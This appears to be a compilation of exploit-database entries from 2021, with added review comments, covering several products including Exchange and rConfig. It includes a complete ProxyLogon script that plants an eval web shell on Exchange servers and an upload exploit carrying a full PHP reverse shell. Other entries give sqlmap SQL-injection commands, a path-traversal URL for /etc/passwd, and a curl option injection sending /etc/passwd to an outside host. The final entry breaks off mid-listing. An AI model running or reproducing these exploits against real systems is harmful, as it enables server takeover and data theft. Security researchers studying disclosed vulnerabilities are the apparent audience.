-
Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)
# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
# Date: 2021-03-10
# Exploit Author: testanull
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2013, 2016, 2019
# CVE: 2021-26855, 2021-27065
#
# NOTE(review): this script is Python 2 only as written. It calls
# str.decode('hex') and tests `"<LegacyDN>" not in ct.content` (a str against
# requests' bytes `.content`); both raise under Python 3.
# NOTE(review): TLS certificate verification is disabled on every request
# (verify=False), so the traffic is open to interception on the way to the target.
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys


def id_generator(size: int = 6, chars: str = string.ascii_lowercase + string.digits) -> str:
    """Return a random string of `size` characters drawn from `chars`.

    Only used to build a fresh /ecp/<name>.js path for each run; `random` is
    not a CSPRNG, which is irrelevant for that purpose.
    """
    return ''.join(random.choice(chars) for _ in range(size))


# NOTE(review): off by one -- sys.argv[2] (the e-mail address) is read below,
# so a single-argument run passes this check and dies with IndexError instead
# of printing the usage text. The condition should be `< 3`.
if len(sys.argv) < 2:
    print("Usage: python PoC.py <target> <email>")
    print("Example: python PoC.py mail.evil.corp [email protected]")
    exit()

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
# Fresh random name for the /ecp/<name>.js path used on every request below.
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
# On-disk location the web shell is written to (under the FrontEnd OWA auth
# directory; presumably served as /owa/auth/ahihi.aspx -- confirm on target).
# The file name is widely known from public reporting and is trivially
# detectable; defenders should hunt for it and for any other new .aspx here.
shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx"
# Same path expressed through the local admin share; this is the value handed
# to ResetOABVirtualDirectory's FilePathName at the end.
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
# Server-side JScript that eval()s the `exec_code` request parameter. It is
# stored in the OAB virtual directory's ExternalUrl and then written to disk
# by the reset step (CVE-2021-27065).
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>'
# Hex-encoded banner text that is decoded and printed at start-up.
legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"
# Autodiscover request for the supplied mailbox; its <LegacyDN> is parsed below.
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> """ % email

print("Attacking target " + target)
print("=============================")
print(legacyDnPatchByte.decode('hex'))  # Python 2 only: str has no .decode() in Python 3
# Fallback back-end name if the probe below does not reveal the real one.
FQDN = "EXCHANGE"
# CVE-2021-26855: the X-BEResource cookie makes the front end proxy the request
# to the named back end without authentication. This first probe only
# harvests the server's own name from the X-FEServer response header.
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", "User-Agent": user_agent}, verify=False)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
    FQDN = ct.headers["X-FEServer"]

# Step 1: proxy an Autodiscover request to obtain the LegacyDN of `email`.
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent}, data=autoDiscoverBody, verify=False )
if ct.status_code != 200:
    print("Autodiscover Error!")
    exit()
if "<LegacyDN>" not in ct.content:  # str-in-bytes: TypeError on Python 3
    print("Can not get LegacyDN!")
    exit()
legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
print("Got DN: " + legacyDn)

# Step 2: MAPI/EMSMDB connect request built from the LegacyDN. The request is
# expected to be rejected; the user's SID is scraped out of the error text.
# The MailboxId GUID is a hard-coded dummy value.
mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, "Content-Type": "application/mapi-http", "User-Agent": user_agent }, data=mapi_body, verify=False )
if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content:
    print("Mapi Error!")
    exit()
sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)

# Step 3: /ecp/proxyLogon.ecp with a hand-built token for that SID. The back
# end is expected to answer 241 and set the ECP session cookie and the
# msExchEcpCanary CSRF token that later DDI calls require.
proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r> """ % sid
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, "Content-Type": "text/xml", "User-Agent": user_agent }, data=proxyLogon_request, verify=False )
if ct.status_code != 241 or not "set-cookie" in ct.headers:
    print("Proxylogon Error!")
    exit()
sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
print("Got session id: " + sess_id)
print("Got canary: " + msExchEcpCanary)

# Sanity check that the session is usable. A non-200 is only reported, not
# fatal -- but the split() right after will raise IndexError if the diagnostics
# page did not come back, so the "skip" comment below is optimistic.
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, sess_id, msExchEcpCanary), "User-Agent": user_agent }, verify=False )
if ct.status_code != 200:
    print("Wrong canary!")
    print("Sometime we can skip this ...")
rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0]  # parsed but never used
# print "Got rbacRole: "+ rbacRole
print("=========== It means good to go!!!====")

# Step 4: look up the OAB virtual directory's identity through the DDI service.
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json={"filter": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, verify=False )
if ct.status_code != 200:
    print("GetOAB Error!")
    exit()
oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0]
print("Got OAB id: " + oabId)

# Step 5: store the web shell in that directory's ExternalUrl, after a '#'
# (presumably so the value still passes URL validation -- not verified here).
# This is a persistent configuration change on the target: the ExternalUrl
# must be restored manually afterwards.
oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "ExternalUrl": "http://ffff/#%s" % shell_content}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=oab_json, verify=False )
if ct.status_code != 200:
    print("Set external url Error!")
    exit()

# Step 6: ResetOABVirtualDirectory exports the directory's settings (including
# the ExternalUrl set above) to FilePathName, i.e. to our .aspx path
# (CVE-2021-27065). Success means the shell file now exists on disk.
reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, "properties": { "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": shell_absolute_path}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), "Content-Type": "application/json; charset=utf-8", "User-Agent": user_agent }, json=reset_oab_body, verify=False )
if ct.status_code != 200:
    print("Write Shell Error!")
    exit()
print("Successful!")
-
Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Author: Richard Jones
# Date: 2021-03-11
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Usage.
# Change Target_IP, REV_IP, REV_PORT to your own
#
# NOTE(review): this is an *authenticated* exploit -- main() logs in with the
# hard-coded credentials "jim"/"jim" (see the login() call below); change them
# to a valid account on the target. A reverse-shell listener must already be
# waiting on REV_IP:REV_PORT when the uploaded file is requested.

import requests


def main() -> None:
    """Log in, upload a PHP reverse shell via modules/random/upload.php and request it.

    Side effects on the target: a new record in the "random" module and a
    rev.php file under modules/random/uploads/ that must be removed manually.
    """
    ##### Change info here #####
    TARGET_IP="127.0.0.1"
    REV_IP="127.0.0.1"
    REV_PORT=9999
    ############################
    LOGIN="/asistorage/login.php"
    MAILING_LIST="/asistorage/modules/random/index.php?view=add"
    UPLOAD_URL="/asistorage/modules/random/upload.php"
    VIEW_ITEM="/asistorage/modules/random/index.php"
    CALL_URL="/asistorage/modules/random/uploads/"
    s = requests.Session()

    def phpshell() -> str:
        """Return Ivan Sincek's PHP reverse shell with OLDIP/OLDPORT placeholders.

        The placeholders are substituted by uploadShell(); the code is
        otherwise the upstream script and is not modified here.
        """
        return """
<?php
// Copyright (c) 2020 Ivan Å incek
// v1.1
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
header('Content-Type: text/plain; charset=UTF-8');
class Shell {
    private $addr = null;
    private $port = null;
    private $os = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $options = array(); // proc_open() options
    private $buffer = 1024; // read/write buffer size
    private $clen = 0; // command length
    private $error = false; // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os = 'WINDOWS';
            $this->shell = 'cmd.exe';
            $this->options['bypass_shell'] = true; // we do not want a shell within a shell
        } else {
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
            exit(0);
        }
    }
    private function daemonize() {
        set_time_limit(0); // do not impose the script execution time limit
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else {
            if (($pid = pcntl_fork()) < 0) {
                echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
            } else if ($pid > 0) {
                echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
                exit(0);
            } else if (posix_setsid() < 0) {
                // once daemonized you will no longer see the script's dump
                echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
            } else {
                echo "DAEMONIZE: Completed successfully!\n";
            }
        }
        umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT
            $size -= $this->offset($input, $iname, $this->clen); // we do not like that
            $this->clen = 0;
        }
        $fragments = ceil($size / $this->buffer); // number of fragments to read
        $remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size
        while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
        }
    }
    private function offset($stream, $name, $offset) {
        $total = $offset;
        while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream
            $offset -= $this->buffer;
        }
        return $offset > 0 ? $total - $offset : $total;
    }
    public function run() {
        $this->daemonize();
        // ----- SOCKET BEGIN -----
        $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
        if (!$socket) {
            echo "SOC_ERROR: {$errno}: {$errstr}\n";
        } else {
            stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
            // ----- SHELL BEGIN -----
            $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
            if (!$process) {
                echo "PROC_ERROR: Cannot start the shell\n";
            } else {
                foreach ($pipes as $pipe) {
                    stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                }
                // ----- WORK BEGIN -----
                fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
                while (!$this->error) {
                    if (feof($socket)) { // check for end-of-file on SOCKET
                        echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                    } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
                        echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
                    } // use proc_get_status() instead
                    $streams = array(
                        'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                        'write' => null,
                        'except' => null
                    );
                    $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
                    if ($num_changed_streams === false) {
                        echo "STRM_ERROR: stream_select() failed\n"; break;
                    } else if ($num_changed_streams > 0) {
                        if ($this->os === 'LINUX') {
                            if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        } else if ($this->os === 'WINDOWS') { // order is important
                            if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        }
                    }
                }
                // ------ WORK END ------
                foreach ($pipes as $pipe) {
                    fclose($pipe);
                }
                proc_close($process);
            }
            // ------ SHELL END ------
            fclose($socket);
        }
        // ------ SOCKET END ------
    }
}
// change the host address and/or port number as necessary
$reverse_shell = new Shell('OLDIP', OLDPORT);
$reverse_shell->Run();
?>"""

    def login(url: str, username: str, password: str) -> bool:
        """POST the login form; return True unless the "Invalid Username" text comes back.

        NOTE(review): the bare `except:` turns every failure (DNS, refused
        connection, timeout) into a silent False, which main() then reports
        as "Login failed"; a narrower `except requests.RequestException`
        would keep the real cause visible. verify=False has no effect on the
        plain-http URL built in main().
        """
        try:
            data = { "uname":username, "upass":password, "btnlogin":"" }
            r = s.post(url,data=data, verify=False)
            page = r.text
            if "Invalid Username or Password, please try again." in page:
                return False
            else:
                return True
        except :
            return False

    def uploadShell(url: str) -> str:
        """Upload rev.php through the "random" module and return the stored file name.

        The name is scraped from the first `download.php?filename=` link on
        the module's index page; the split() raises IndexError if no such
        link is present (e.g. the upload was rejected with a 200 page).
        """
        s.get(f"{url}{MAILING_LIST}") # Call page
        # The placeholders in the PHP source are replaced with the listener
        # address here; the upload is sent as a generic octet-stream with a
        # .php name, which is what the server stores unchanged.
        fileData = { 'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")}
        # NOTE(review): duplicate keys -- a Python dict literal keeps the last
        # value, so what is actually sent is pname='a', cutoff='a',
        # projectname=''. The earlier entries are dead.
        data={ "pname":"", "pname":"a", 'cutoff':'', 'cutoff':'a', 'projectname':'', 'type':'a', 'projectname':'', 'dsend':'2029-03-19', 'desc':'a', 'MAX_FILE_SIZE':100000, 'Uploader':'', }
        up_url=f"{url}{UPLOAD_URL}"
        r = s.post(up_url, files=fileData,data=data, verify=False)
        # A 200 is taken as success; the server's own error pages may also
        # return 200, so the real check is the link scraped below.
        if r.status_code == 200:
            print("shell uploaded")
        else:
            print("Shell upload failed")
            exit(0)
        r = s.get(f"{url}{VIEW_ITEM}")
        page = r.text
        DL_URL=page.split("download.php?filename=")[1].split("\">")[0]
        return DL_URL

    #Login
    base_url=f"http://{TARGET_IP}"
    login_url=f"{base_url}{LOGIN}"
    # Hard-coded test credentials; replace with a valid account on the target.
    b=login(login_url, "jim", "jim")
    if not b:
        print("Login failed, Try again...")
        exit(0)
    #CAll shell
    base=f"{base_url}"
    CALL_URL_PART=uploadShell(base)
    c_url=f"{base}{CALL_URL}{CALL_URL_PART}"
    # Requesting the uploaded file executes it; the PHP side daemonizes and
    # connects back to REV_IP:REV_PORT, so this GET may block until the
    # listener closes the connection.
    s.get(c_url)
    #Shell can be found at http:/TARGET//asistorage/modules/random/uploads/


if __name__ == "__main__":
    main()
-
Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
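# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10
# Steps:
# 1- Run the python script. (payload.py)
# 2- Open payload.txt and copy its content to the clipboard.
# 3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
# 4- Register -> Enter Registration Code
# 5- Paste the clipboard into the "Key" or "Name" field.
# 6- Click on OK.
# 7- The application crashes.
#
# NOTE(review): this is a crash-only PoC -- 300 bytes of 'A' pasted into a GUI
# text field. Nothing in this listing demonstrates control of execution, so
# treat it as a local denial of service until a debugger session shows more.
#
# ---> payload.py <--
#!/usr/bin/env python3
"""Write the Nsasoft DoS trigger string to payload.txt in the working directory."""

# Length of the trigger string; the original PoC used 300 bytes.
PAYLOAD_LENGTH = 300
# "\x41" is ASCII 'A' -- an easily recognisable filler when inspecting the crash.
buffer = "\x41" * PAYLOAD_LENGTH

try:
    # The context manager closes the file even if write() raises; mode "w"
    # truncates any payload.txt left over from a previous run.
    with open("payload.txt", "w") as f:
        f.write(buffer)
except OSError as exc:
    # Only filesystem errors are expected here; anything else should surface
    # rather than be swallowed by a bare except.
    print("File cannot be created! ({})".format(exc))
else:
    print("File created!")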
-
Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps (the injectable parameter is on the login form itself, so no credentials are needed):
1. Run sqlmap: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch
2. sqlmap reports: Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=
Exploit paths (time-based blind, so expect each extracted byte to cost several seconds):
Database: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs
Tables: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables [11 tables] +------------+ | accounts | | attendance | | contacts | | employee | | gallery | | msexcel | | msppt | | msword | | oic | | random | | sign | +------------+
-
Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
# Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
# Date: 2020-11-06
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.vembu.com/
# Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe
# Version: Version 4.2.0.1 U1
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc "hsflowd" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: hsflowd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Host_sFlow_Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem
C:\Users\m507>sc qc "VembuBDR360Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuBDR360Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuBDR360Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem
C:\Users\m507>sc qc "VembuOffice365Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuOffice365Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuOffice365Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit: All three BINARY_PATH_NAME values are unquoted and contain a space ("C:\Program Files\..."), and every service is AUTO_START under LocalSystem, so Windows will look for C:\Program.exe before the real binary; a local user who can create that file gets it executed as SYSTEM at the next service start or reboot. Caveat: the only space in each path is in "Program Files" (the "\..\" segment adds no further candidates), so the one planting location is the root of C:\, which standard users cannot write to on a default Windows install. Verify the ACL on C:\ with icacls before reporting this as a working privilege escalation.
-
Zenario CMS 8.8.53370 - 'id' Blind SQL Injection
# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection
# Date: 05/02/2021
# Exploit Author: Balaji Ayyasamy
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.53370
# Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14
# CVE: CVE-2021-26830
# Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d
Step 1 - Log in to Zenario CMS with administrator credentials (the vulnerable delete request is only reachable from the authenticated admin interface, so this is a post-authentication issue).
Step 2 - Go to Modules and select Plugin Library.
Step 3 - Select any plugin and press the Delete button. Capture the resulting delete request (e.g. with an intercepting proxy), save it to request.txt and hand it to sqlmap, pointing it at the id parameter.
Command - sqlmap -r request.txt -p id
-
MagpieRSS 0.72 - 'url' Command Injection
# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
# Date: 24 March 2021
# Exploit Author: bl4ckh4ck5
# Vendor Homepage: http://magpierss.sourceforge.net/
# Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download
# Version: MagpieRSS 0.72 and possibly older versions as well.
# Tested on: Linux Debian buster with a default Apache install.
In MagpieRSS 0.72, on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php pages, there is a command injection in the RSS URL field when you submit an https URL and click the "Parse RSS" button. If you send "https://www.example.com? -o /var/www/html/testtest.php" as input, the fetched URL's output is saved to testtest.php directly in the /var/www/html/ folder. The "?" is important or it won't work. It is also possible to read any file the web server process can read: sending "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" makes the host "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" receive the contents of /etc/passwd as POST data. Beyond that, because the curl command is executed directly from the shell, it is not restricted and it is possible to request internal pages such as 127.0.0.1. The input is restricted to https URLs only, but you can partially work around that by sending the URL as "https://www.example.com? http://localhost/server-status/": curl then also fetches the http URL, although in that case the SSRF is blind. For https targets you can make the response visible by first saving it to a file; if you cannot write to the /var/www/html folder you can sometimes write to /tmp/testtest.txt and then use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file.
The problem occurs in the file /extlib/Snoopy.class.inc on line 660: https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660 There, escapeshellcmd() is applied to the https URL, but the result is not wrapped in quotes when it is interpolated into the curl command line. escapeshellcmd() leaves spaces and a leading "-" untouched, so an attacker can append additional curl options and effectively rewrite the curl command invoked by /scripts/magpie_debug.php and /scripts/magpie_simple.php. From there it can be escalated to server-side request forgery or code injection (writing a PHP file into the web root, as shown above). It most likely affects most versions, but it has only been tested on version 0.72.
-
rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
# Date: 2021-03-12
# Exploit Author: 5a65726f
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
# Description: rConfig, the open source network device configuration management tool, is vulnerable to a path traversal in /lib/ajaxHandlers/ajaxGetFileByPath.php via the path parameter. ajaxGetFileByPath.php returns the requested file for download, so any authenticated user can read any file the web server process has access to (this is arbitrary file read/download rather than code inclusion, despite the "LFI" label). The following steps reproduce this vulnerability:
- Log in to the rConfig application with your credentials.
- Enter the following link in your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
-
QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path
# Exploit Title: QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2021-03-14
# Vendor Homepage: https://www.qnap.com
# Tested Version: 5.0.0.13230
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
